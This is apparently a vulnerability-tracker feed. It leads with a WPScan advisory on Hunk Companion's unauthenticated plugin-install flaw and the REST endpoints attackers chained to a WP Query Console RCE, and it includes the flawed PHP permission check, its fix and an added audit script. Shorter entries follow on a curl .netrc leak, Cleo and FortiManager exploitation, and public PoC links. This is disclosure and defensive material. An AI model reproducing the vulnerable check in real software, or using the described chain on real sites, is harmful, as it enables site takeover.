This vulnerability represents a significant and multifaceted threat, targeting sites that use both a ThemeHunk theme and the Hunk Companion plugin. With over 10,000 active installations, this exposed thousands of websites to anonymous, unauthenticated attacks capable of severely compromising their integrity.

What makes this attack particularly dangerous is its combination of factors—leveraging a previously patched vulnerability in Hunk Companion to install a now‑removed plugin with a known Remote Code Execution flaw. The chain of exploitation underscores the importance of securing every component of a WordPress site, especially third‑party themes and plugins, which can become critical points of entry for attackers.

As WordPress remains the most popular content management system in the world, such vulnerabilities serve as a stark reminder of the ongoing challenges in maintaining site security. It’s imperative for developers, site owners, and plugin authors alike to adopt proactive measures, such as regularly updating plugins and themes, auditing for known vulnerabilities, and disabling unused or unnecessary extensions.

Timeline

Nov 27th, 2024 – Internal discovery of this vulnerability. We reported the issue to Hunk Companion.

Dec 10th, 2024 – Hunk Companion acknowledges the issue and releases a patch.

Dec 10th, 2024 – We published this advisory.

The PoC will be displayed on January 14, 2025, to give users the time to update.

Credits

Original research: Daniel Rodriguez

Acknowledgments: Special thanks to the WPScan team and Ashley Robicheau for feedback, help, and corrections.


{
   uuid: "5e1cc667-8f06-4cde-b167-203c95a1038c",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan",
   description: "# Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan\n\nRef: https://wpscan.com/blog/unauthorized-plugin-installation-activation-in-hunk-companion/\n\nThis report highlights a vulnerability in the [Hunk Companion plugin](https://wordpress.org/plugins/hunk-companion/) < 1.9.0 that allows unauthenticated POST requests to install and activate plugins directly from the WordPress.org repository.\n\nThis flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution (RCE), SQL Injection, Cross‑Site Scripting (XSS), or even the creation of administrative backdoors. By leveraging these outdated or unmaintained plugins, attackers can bypass security measures, manipulate database records, execute malicious scripts, and gain unauthorized administrative access to the site.\n\nMethod of Exploitation\n----------------------\n\nWhile tracing an infection on a WordPress site, we uncovered a live vulnerability currently being exploited in a two‑step process:\n\n1.  **Unauthenticated Installation/Activation**: Attackers exploit a flaw to install and activate the now‑closed and vulnerable plugin, [WP Query Console](https://wordpress.org/plugins/wp-query-console/)\n2.  **Remote Code Execution (RCE)**: The vulnerability in WP Query Console is then exploited to evaluate arbitrary and malicious PHP code.\n\nIn the infections we’ve analyzed, attackers use the RCE to write a PHP dropper to the site’s root directory. This dropper allows continued unauthenticated uploads via GET requests, enabling persistent backdoor access to the site.\n\nInvestigation\n-------------\n\nThe vulnerability was uncovered during an investigation into the entry point for an infection caused by its exploitation. 
Access logs revealed that the `change timestamp` of a randomly named PHP file located in the root of the WordPress installation (`/htdocs/aea74fff3c02.php`) was preceded by requests to the following endpoints:\n\n\n\n* Time: Nov 27, 2024 @ 08:21:41.812\n  * request_url: /aea74fff3c02.php\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: GET\n* Time: Nov 27, 2024 @ 08:21:41.561\n  * request_url: /?rest_route=/wqc/v1/query\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n* Time: Nov 27, 2024 @ 08:21:40.354\n  * request_url: /wp-json/hc/v1/themehunk-import\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n* Time: Nov 27, 2024 @ 08:21:08.151\n  * request_url: /wp-json/hc/v1/themehunk-import\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n\n\nFurther investigation revealed that the plugins responsible for these endpoints are **Hunk Companion** and **WP Query Console**, respectively. Each observed infection’s modification times aligned with POST requests to these same endpoints.\n\nThe Remote Code Execution (RCE) vulnerability in WP Query Console, reported under [CVE‑2024‑50498](https://www.cve.org/CVERecord?id=CVE-2024-50498), remains unpatched. 
Meanwhile, the unauthenticated plugin installation/activation vulnerability in Hunk Companion was reportedly fixed in version 1.8.5 and greater, as documented in [CVE‑2024‑9707](https://www.cve.org/CVERecord?id=CVE-2024-9707).\n\nUpon further review, we confirmed that this infection did, in fact, occur with the latest version of Hunk Companion at that time, 1.8.7, indicating that the vulnerability had persisted in the current version.\n\nCode Analysis\n-------------\n\nAn analysis of the code responsible for the `themehunk‑import` endpoint revealed the vulnerability being exploited.\n\nWithin the file `hunk‑companion/import/core/class‑installation.php`, the class `HUNK_COMPANION_SITES_BUILDER_SETUP` is executed by the endpoint and handles plugin installation and activation.\n\nOn line 204, the following code demonstrates that the WordPress.org URL is hardcoded, restricting installations to plugins hosted on the WordPress.org repository:\n\n```\n$temp_file = download_url('https://downloads.wordpress.org/plugin/'.$slug.'.zip');\n\n```\n\n\nHowever, this URL allows the download of plugins, even if they have been closed or removed from the repository. This behavior introduces a significant vector for exploitation, enabling attackers to install vulnerable plugins.\n\nThe vulnerability stems from the weakness found in `hunk‑companion/import/app/app.php`:\n\n```\n        register_rest_route( 'hc/v1', 'themehunk-import', array(\n          'methods' => 'POST',\n          'callback' => array( $this, 'tp_install' ),\n          'permission_callback' => function () {\n    // Check if the user is logged in\n    if ( ! is_user_logged_in() ) {\n      //return new WP_REST_Response( 'Unauthorized: User not logged in', 401 );\n    }\n\n    // Debug: Log the user role and capabilities to see what they have\n    $current_user = wp_get_current_user();\n    // error_log( 'Current user: ' . $current_user->user_login );\n    // error_log( 'User roles: ' . 
implode( ', ', $current_user->roles ) );\n    // error_log( 'User capabilities: ' . print_r( $current_user->allcaps, true ) );\n\n    // Ensure the user has the 'install_plugins' capability\n    if ( ! current_user_can( 'install_plugins' ) ) {\n        return new WP_REST_Response( 'Unauthorized: Insufficient capabilities', 401 );\n    }\n\n      // Get the nonce from the request header\n            $nonce = $request->get_header('X-WP-Nonce');\n\n            // Verify the nonce\n            if ( ! wp_verify_nonce( $nonce, 'hc_import_nonce' ) ) {\n                return new WP_REST_Response( 'Unauthorized: Invalid nonce', 401 );\n            }\n\n    return true; // Permission granted\n},\n\n      ) );\n\n```\n\n\nLines 28‑59 register the REST API route for `themehunk‑import`. In version 1.8.5, the plugin author introduced a `permission_callback` to restrict access. However, for [`permission_callback`](https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/#permissions-callback) to work correctly, it must return a boolean (`false` to reject requests, `true` to accept) or a `WP_Error` object.\n\nIn this case, failed conditions return `new WP_REST_Response`, which is not a boolean or `WP_Error`. As a result, the `permission_callback` always evaluates to `true`, allowing unauthenticated requests to bypass the intended checks. This flaw enables the execution of the `tp_install` function, which invokes the `HUNK_COMPANION_SITES_BUILDER_SETUP` class, leading to the installation and activation of arbitrary plugins.\n\n### Recommended Fix\n\nTo address this issue, the `themehunk‑import` and `ai‑site‑import` endpoints needed to be patched. Specifically, the return statements for failed conditions needed to be changed. For example, replace:\n\n```\nreturn new WP_REST_Response( 'Unauthorized: User not logged in', 401 );\n\n```\n\n\nWith:\n\n```\nreturn new WP_Error( 'unauthorized', __( 'You must be logged in.' 
), array( 'status' => 401 ) );\n\n```\n\n\nThis change ensures the `permission_callback` correctly denies unauthorized requests, mitigating the vulnerability.\n\nAs of 1.9.0, the author implemented the necessary patch, and we have confirmed that the exploit is no longer present.\n\nConclusion\n----------\n\nThis vulnerability represents a significant and multifaceted threat, targeting sites that use both a [ThemeHunk theme](https://profiles.wordpress.org/themehunk/#content-themes) and the Hunk Companion plugin. With over 10,000 active installations, this exposed thousands of websites to anonymous, unauthenticated attacks capable of severely compromising their integrity.\n\nWhat makes this attack particularly dangerous is its combination of factors—leveraging a previously patched vulnerability in Hunk Companion to install a now‑removed plugin with a known Remote Code Execution flaw. The chain of exploitation underscores the importance of securing every component of a WordPress site, especially third‑party themes and plugins, which can become critical points of entry for attackers.\n\nAs WordPress remains the most popular content management system in the world, such vulnerabilities serve as a stark reminder of the ongoing challenges in maintaining site security. It’s imperative for developers, site owners, and plugin authors alike to adopt proactive measures, such as regularly updating plugins and themes, auditing for known vulnerabilities, and disabling unused or unnecessary extensions.\n\nTimeline\n--------\n\n**Nov 27th, 2024** – Internal discovery of this vulnerability. 
We reported issue to Hunk Companion\n\n**Dec 10th, 2024** – Hunk Companion confirms acknowledges issue and releases a patch.\n\n**Dec 10th, 2024** – We published this advisory.\n\n_The PoC will be displayed on January 14, 2025, to give users the time to update._\n\nCredits\n-------\n\nOriginal research: Daniel Rodriguez\n\n**Acknowledgments**: Special thanks to the WPScan team and Ashley Robicheau for feedback, help, and corrections.",
   description_format: "markdown",
   vulnerability: "CVE-2024-11972",
   creation_timestamp: "2024-12-15T06:47:50.105587+00:00",
   timestamp: "2024-12-15T06:47:50.105587+00:00",
   related_vulnerabilities: [
      "CVE-2024-9707",
      "CVE-2024-50498",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

cve-2024-11972
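The advisory above explains that a permission_callback which denies with a WP_REST_Response can never actually deny anything, because WordPress only treats false, null or a WP_Error as a refusal. The following audit script is an added example (not WPScan's code and not part of the Hunk Companion plugin): it finds inline permission_callback closures in PHP source and flags any whose return statements hand back a WP_REST_Response. SAMPLE_PHP is constructed to mirror the vulnerable shape from the advisory, with a second route (ai-site-import, and its ai_install callback name) written in the fixed shape for contrast; that second route's contents, and all function names, are this example's own.

```python
"""
Added example (not from the WPScan advisory or the Hunk Companion plugin): a
small audit that flags REST route registrations whose permission_callback can
never deny a request because it returns a WP_REST_Response instead of false or
WP_Error. The PHP sample below is constructed to mirror the vulnerable shape
described in the advisory; the function names are this example's own.
"""
import re

# Constructed sample: the first route denies with WP_REST_Response (the bug),
# the second denies with WP_Error (the advisory's recommended fix).
SAMPLE_PHP = r"""
register_rest_route( 'hc/v1', 'themehunk-import', array(
  'methods' => 'POST',
  'callback' => array( $this, 'tp_install' ),
  'permission_callback' => function () {
    if ( ! current_user_can( 'install_plugins' ) ) {
        return new WP_REST_Response( 'Unauthorized: Insufficient capabilities', 401 );
    }
    return true;
  },
) );

register_rest_route( 'hc/v1', 'ai-site-import', array(
  'methods' => 'POST',
  'callback' => array( $this, 'ai_install' ),
  'permission_callback' => function () {
    if ( ! current_user_can( 'install_plugins' ) ) {
        return new WP_Error( 'unauthorized', __( 'You must be logged in.' ), array( 'status' => 401 ) );
    }
    return true;
  },
) );
"""

ROUTE_RE = re.compile(r"register_rest_route\(\s*'([^']*)'\s*,\s*'([^']*)'")
PERM_RE = re.compile(r"'permission_callback'\s*=>\s*function\s*\([^)]*\)\s*\{")
BAD_RETURN_RE = re.compile(r"\breturn\s+new\s+WP_REST_Response\b")


def closure_body(src: str, open_brace: int) -> str:
    """Return the text between the '{' at open_brace and its matching '}'."""
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_brace + 1:i]
    raise ValueError("unbalanced braces in permission_callback")


def audit_permission_callbacks(src: str) -> list[dict]:
    """
    For every inline permission_callback closure, count the return statements
    that hand back a WP_REST_Response. WordPress treats any value that is not
    false/null/WP_Error as permission granted, so such a return never denies.
    """
    findings = []
    for m in PERM_RE.finditer(src):
        body = closure_body(src, m.end() - 1)
        # Ignore '//' line comments so a commented-out return is not counted
        # (a '//' inside a string literal would also be dropped; fine for an audit).
        body = re.sub(r"//[^\n]*", "", body)
        # Attribute the closure to the nearest preceding register_rest_route() call.
        routes = list(ROUTE_RE.finditer(src, 0, m.start()))
        route = f"{routes[-1].group(1)}/{routes[-1].group(2)}" if routes else "<unknown>"
        bad_returns = len(BAD_RETURN_RE.findall(body))
        findings.append({"route": route, "bad_returns": bad_returns,
                         "flagged": bad_returns > 0})
    return findings


if __name__ == "__main__":
    for f in audit_permission_callbacks(SAMPLE_PHP):
        status = "NEVER DENIES" if f["flagged"] else "ok"
        print(f"{f['route']}: {status} ({f['bad_returns']} WP_REST_Response return(s))")
```

Run it against a plugin's source files to get a quick list of routes whose denial paths are silently ignored; a flagged route needs its failed-condition returns changed to WP_Error (or false), as the advisory recommends.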

netrc and redirect credential leak on cve-2024-11053
4 months ago by Cédric Bonhomme

When asked to both use a .netrc file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances.

This flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password.

Info

"A curl transfer with a.tld that redirects to b.tld that uses a .netrc like below (with a match, but no password specified for the second host), would make curl pass on alicespassword as password even in the second transfer to the separate host b.tld.

machine a.tld
  login alice
  password alicespassword
default
  login bob

This bug is not considered a C mistake. It is not likely to have been avoided had we not been using C.

This flaw also affects the curl command line tool.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2024-11053 to this issue.

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Severity: Low"


{
   uuid: "36846c73-0c66-4bdf-b5f9-3a3b65823062",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "netrc and redirect credential leak",
   description: "When asked to both use a .netrc file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password.\n\n### Info\n\n> \"A curl transfer with a.tld that redirects to b.tld that uses a .netrc like below (with a match, but no password specified for the second host), would make curl pass on alicespassword as password even in the second transfer to the separate host b.tld.\n> \n> machine a.tld\n>   login alice\n>   password alicespassword\n> default\n>   login bob\n> \n> This bug is not considered a C mistake. It is not likely to have been avoided had we not been using C.\n> \n> This flaw also affects the curl command line tool.\n> \n> The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2024-11053 to this issue.\n> \n> CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n> \n> Severity: Low\"\n\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-11053",
   creation_timestamp: "2024-12-11T09:52:06.061616+00:00",
   timestamp: "2024-12-11T09:52:06.061616+00:00",
   related_vulnerabilities: [
      "CVE-2024-11053",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
      {
         ref: [
            "https://mastodon.social/@bagder/113632978982393745",
            "https://curl.se/docs/CVE-2024-11053.html",
         ],
      },
   ],
}

cve-2024-11053
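The condition described in the quoted advisory, as an added example that is not part of the curl advisory or of curl's code: a minimal .netrc parser and a per-host credential lookup, with a model of the leaky behaviour (the first host's password surviving the redirect when the target's entry has none) next to the correct behaviour (credentials for the redirect target resolved from scratch). NETRC_TEXT is the advisory's sample file extended with a constructed c.tld entry to cover the "omits just the password" case; function names are this example's own.

```python
"""
Added example (not curl's code): a minimal .netrc parser plus a per-host
credential lookup that shows the condition described in the advisory. A client
that follows a redirect must take credentials for the new host only from that
host's own netrc entry (or the default entry); it must never carry the password
chosen for the first host over to the second.
"""
from typing import Optional

# The .netrc from the advisory, extended with a constructed c.tld entry that
# has a login but no password (the other condition the advisory names).
NETRC_TEXT = """
machine a.tld
  login alice
  password alicespassword
machine c.tld
  login carol
default
  login bob
"""


def parse_netrc(text: str) -> dict[str, dict[str, str]]:
    """Parse netrc tokens into {host: {'login': ..., 'password': ...}}; the default entry is stored under 'default'."""
    entries: dict[str, dict[str, str]] = {}
    current = None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "machine":
            current = entries.setdefault(tokens[i + 1], {})
            i += 2
        elif tok == "default":
            current = entries.setdefault("default", {})
            i += 1
        elif tok in ("login", "password", "account") and current is not None:
            current[tok] = tokens[i + 1]
            i += 2
        else:
            raise ValueError(f"unexpected token {tok!r}")
    return entries


def credentials_for(entries: dict, host: str) -> tuple[Optional[str], Optional[str]]:
    """Credentials for one host, taken only from its own entry or, failing that, the default entry."""
    entry = entries[host] if host in entries else entries.get("default")
    if entry is None:
        return None, None
    return entry.get("login"), entry.get("password")


def leaky_redirect(entries: dict, first_host: str, redirect_host: str):
    """Model of the flawed behaviour: fields missing from the target's entry keep the first host's values."""
    login, password = credentials_for(entries, first_host)
    new_login, new_password = credentials_for(entries, redirect_host)
    if new_login is not None:
        login = new_login
    if new_password is not None:  # a missing password leaves the old one in place: the leak
        password = new_password
    return login, password


def safe_redirect(entries: dict, first_host: str, redirect_host: str):
    """Correct behaviour: the redirect target is resolved on its own; nothing carries over."""
    return credentials_for(entries, redirect_host)


if __name__ == "__main__":
    netrc = parse_netrc(NETRC_TEXT)
    for target in ("b.tld", "c.tld"):
        print(f"a.tld -> {target}: leaky={leaky_redirect(netrc, 'a.tld', target)} "
              f"safe={safe_redirect(netrc, 'a.tld', target)}")
```

The same lookup is also a cheap way to audit a .netrc file: any machine or default entry that returns a None password is one that a credential-reusing client could have filled in from another host.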

INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾 (source reddit) on cve-2024-50623
4 months ago by Alexandre Dulaunoy

https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild

On December 3, Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers. We’ve directly observed evidence of threat actors exploiting this software en masse and performing post-exploitation activity. Although Cleo published an update and advisory for CVE-2024-50623—which allows unauthenticated remote code execution—Huntress security researchers have recreated the proof of concept and learned the patch does not mitigate the software flaw.

TL;DR - This vulnerability is being actively exploited in the wild and fully patched systems running 5.8.0.21 are still exploitable. We strongly recommend you move any internet-exposed Cleo systems behind a firewall until a new patch is released.


{
   uuid: "92cdf9dd-1009-427b-8181-b444dc288f89",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾 (source reddit)",
   description: "- [INCIDENT: Threat Actors Currently Mass-Exploiting Cleo Servers (0-day-ish) 👾 ](https://www.reddit.com/r/sysadmin/comments/1haqguq/incident_threat_actors_currently_massexploiting/?rdt=59586)\n\nhttps://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\n\nOn December 3, Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers. We’ve directly observed evidence of threat actors exploiting this software en masse and performing post-exploitation activity. Although Cleo published an update and advisory for CVE-2024-50623—which allows unauthenticated remote code execution—Huntress security researchers have recreated the proof of concept and learned the patch does not mitigate the software flaw.\n\n‍TL;DR - This vulnerability is being actively exploited in the wild and fully patched systems running 5.8.0.21 are still exploitable. We strongly recommend you move any internet-exposed Cleo systems behind a firewall until a new patch is released.",
   description_format: "markdown",
   vulnerability: "CVE-2024-50623",
   creation_timestamp: "2024-12-10T07:56:04.828065+00:00",
   timestamp: "2024-12-10T07:57:07.099373+00:00",
   related_vulnerabilities: [
      "CVE-2024-50623",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

cve-2024-50623

CVE-2024-36401 GeoServer Remote Code Execution on cve-2024-36401
4 months ago by Alexandre Dulaunoy


{
   uuid: "a306876b-06cc-486b-988e-78087547fd22",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-36401 GeoServer Remote Code Execution",
   description: "- CVE-2024-36401 GeoServer Remote Code Execution - https://github.com/0x0d3ad/CVE-2024-36401",
   description_format: "markdown",
   vulnerability: "cve-2024-36401",
   creation_timestamp: "2024-11-28T21:52:40.484680+00:00",
   timestamp: "2024-11-28T21:52:40.484680+00:00",
   related_vulnerabilities: [
      "CVE-2024-36401",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-36401

Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack on cve-2024-52301
4 months ago by Alexandre Dulaunoy


{
   uuid: "cb0ad24f-1243-4f18-9607-95a5717fb451",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack",
   description: "- [Kritische Sicherheitslücke in Laravel Framework - Updates verfügbar ](https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-laravel-framework-updates-verfugbar)\n- [Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack](https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-millions-of-web-applications-to-attack/)",
   description_format: "markdown",
   vulnerability: "CVE-2024-52301",
   creation_timestamp: "2024-11-18T07:05:03.432836+00:00",
   timestamp: "2024-11-18T07:05:28.583042+00:00",
   related_vulnerabilities: [
      "CVE-2024-52301",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

cve-2024-52301

Rapid7 analysis of CVE-2024-47575 on cve-2024-47575
5 months ago by Alexandre Dulaunoy


{
   uuid: "9579afd1-e7a6-4754-8574-5acaed28e11d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Rapid7 analysis of CVE-2024-47575",
   description: "- [Rapid7 Analysis of CVE-2024-47575](https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis#rapid7-analysis)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-11-14T08:13:33.806989+00:00",
   timestamp: "2024-11-14T08:13:33.806989+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

cve-2024-47575

Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System on cve-2024-43093
5 months ago by Cédric Bonhomme

« Nov 05, 2024 – Ravie Lakshmanan – Mobile Security / Vulnerability

Vulnerability in Android System

Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.

The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories, according to a code commit message.»

Android Security Bulletin November 2024


{
   uuid: "a57c1b41-602a-4340-b6bf-c7e95751f645",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System",
   description: "> \n« Nov 05, 2024 Ravie LakshmananMobile Security / Vulnerability\nVulnerability in Android System\n\nGoogle has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.\n\nThe vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to \"Android/data,\" \"Android/obb,\" and \"Android/sandbox\" directories, and their respective sub-directories, according to a code commit message.»\n\n\n[Android Security Bulletin November 2024](https://source.android.com/docs/security/bulletin/2024-11-01)",
   description_format: "markdown",
   vulnerability: "CVE-2024-43093",
   creation_timestamp: "2024-11-08T08:48:36.588145+00:00",
   timestamp: "2024-11-08T08:49:29.657124+00:00",
   related_vulnerabilities: [
      "CVE-2024-43093",
   ],
   meta: [
      {
         refs: [
            "https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html",
            "https://source.android.com/docs/security/bulletin/2024-11-01",
         ],
      },
   ],
}

cve-2024-43093

Proof of concept for CVE-2024-37383 on cve-2024-37383
5 months ago by Alexandre Dulaunoy


{
   uuid: "59dce60f-7719-44c7-9f8b-5ef37763c997",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof of concept for CVE-2024-37383",
   description: "- [https://github.com/bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC)",
   description_format: "markdown",
   vulnerability: "CVE-2024-37383",
   creation_timestamp: "2024-11-07T17:02:33.331102+00:00",
   timestamp: "2024-11-07T17:02:33.331102+00:00",
   related_vulnerabilities: [
      "CVE-2024-37383",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-37383

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution (still exploited) on cve-2023-28771
5 months ago by Alexandre Dulaunoy

  • https://packetstormsecurity.com/files/172820/Zyxel-IKE-Packet-Decoder-Unauthenticated-Remote-Code-Execution.html

We still see exploitation of that vulnerability in a black-hole network.


{
   uuid: "3f11fc07-94c7-4c49-b71c-caff6266b8b2",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution (still exploited)",
   description: "- https://packetstormsecurity.com/files/172820/Zyxel-IKE-Packet-Decoder-Unauthenticated-Remote-Code-Execution.html\n\nWe still see exploitation of that vulnerability in a black-hole network.",
   description_format: "markdown",
   vulnerability: "CVE-2023-28771",
   creation_timestamp: "2024-11-06T15:21:53.583555+00:00",
   timestamp: "2024-11-06T15:21:53.583555+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

cve-2023-28771

Chrome - Stable Channel Update for Desktop on cve-2024-10826
5 months ago by Alexandre Dulaunoy

CVE-2024-10826: Use after free in Family Experiences. Reported by Anonymous on 2024-09-29


{
   uuid: "c1a30f74-0435-4ac7-a977-50ef00fdffe0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Chrome -  Stable Channel Update for Desktop",
   description: "- [Stable Channel Update for Desktop](https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop.html)\n\nCVE-2024-10826: Use after free in Family Experiences. Reported by Anonymous on 2024-09-29",
   description_format: "markdown",
   vulnerability: "CVE-2024-10826",
   creation_timestamp: "2024-11-06T09:47:00.820445+00:00",
   timestamp: "2024-11-06T09:47:00.820445+00:00",
   related_vulnerabilities: [
      "CVE-2024-10826",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-10826

Chrome release - Stable Channel Update for Desktop on cve-2024-10827
5 months ago by Alexandre Dulaunoy


{
   uuid: "65dab379-0829-483c-b7ec-7176fcaec354",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Chrome release -  Stable Channel Update for Desktop",
   description: "- [Chrome release -  Stable Channel Update for Desktop ](https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop.html)\n\n High CVE-2024-10827: Use after free in Serial. Reported by Anonymous on 2024-10-23",
   description_format: "markdown",
   vulnerability: "CVE-2024-10827",
   creation_timestamp: "2024-11-06T09:34:53.961210+00:00",
   timestamp: "2024-11-06T09:34:53.961210+00:00",
   related_vulnerabilities: [
      "CVE-2024-10827",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-10827

"Please, remove this from the Internet *even if fully patched*" comment from watchTowr on cve-2024-47575
5 months ago by Alexandre Dulaunoy

we’re back, and despite all the buzz about FortiManager - the saga is about to continue.

Please, remove this from the Internet *even if fully patched*

speak soon.

Ref: https://x.com/watchtowrcyber/status/1853262240822276534


{
   uuid: "fc8919b9-2200-4953-9752-83a8d586e76e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "\"Please, remove this from the Internet *even if fully patched*\" comment from watchTowr",
   description: "~~~\nwe’re back, and despite all the buzz about FortiManager - the saga is about to continue.\n\nPlease, remove this from the Internet *even if fully patched*\n\nspeak soon.\n~~~\n\nRef: [https://x.com/watchtowrcyber/status/1853262240822276534](https://x.com/watchtowrcyber/status/1853262240822276534)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-11-05T13:43:12.294048+00:00",
   timestamp: "2024-11-05T13:43:12.294048+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

cve-2024-47575

MISP event related with IoCs on cve-2024-47575
5 months ago by Alexandre Dulaunoy

A MISP event in JSON format is available with all details and IoCs.


{
   uuid: "e147bc02-1352-4685-8d0a-692e2fe98072",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "MISP event related with IoCs",
   description: "A MISP event in JSON format is available with all details and IoCs.\n\n- [MISP event Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)](https://www.circl.lu/doc/misp/feed-osint/4fe85264-fb26-494e-8eb7-da101e19e291.json)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-25T07:18:54.820316+00:00",
   timestamp: "2024-10-25T07:18:54.820316+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-47575

(Vendor information) Missing authentication in fgfmsd on cve-2024-47575
5 months ago by Alexandre Dulaunoy

A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.

Reports have shown this vulnerability to be exploited in the wild.

PSIRT | FortiGuard Labs

Summary

Version                  Affected                 Solution
FortiManager 7.6         7.6.0                    Upgrade to 7.6.1 or above
FortiManager 7.4         7.4.0 through 7.4.4      Upgrade to 7.4.5 or above
FortiManager 7.2         7.2.0 through 7.2.7      Upgrade to 7.2.8 or above
